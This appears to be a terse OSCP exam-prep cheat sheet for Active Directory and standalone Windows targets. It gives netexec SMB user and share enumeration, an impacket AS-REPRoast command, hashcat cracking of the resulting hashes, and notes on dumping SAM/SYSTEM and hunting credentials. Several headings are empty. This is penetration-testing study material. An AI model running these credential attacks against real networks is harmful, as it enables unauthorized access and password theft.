OSCP

🖥️ MS01

🚀 PE

# List current user's privileges
whoami /priv
$ nxc smb <target> -u <user> -p <pass> --users | awk '$1 == "SMB" && $5 != "[+]" && $5 != "-Username-" && $5 != "[*]" && $5 != "Guest" && $5 != "krbtgt" {print $5}' > domain_users
nxc smb 192.168.X.X -u <user> -p <pass> --shares
# AS-REPRoast
impacket-GetNPUsers oscp.exam/ -dc-ip 10.10.X.X -no-pass -usersfile domain_users

# Crack obtained hashes
hashcat -m 18200 asreproast_users /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
  • If sql_svc → interact directly

🔎Pillaging

🖧 Pivot

🖥️ MS02

🚀 PE

  • Dump SAM and SYSTEM locally

🖥️ Standalones

🦶 Foothold

  • TCP → manual probe/google "weird" ports, tech versions → PoC

  • UDP → SNMP → repeated strings, usernames, creds, hints

  • Check dirs for tech versions → PoC

  • Check file's metadata → usernames → weak creds (bob:bob)

  • Look out for .git repos → creds for remote access

🚀 PE

Last updated

Was this helpful?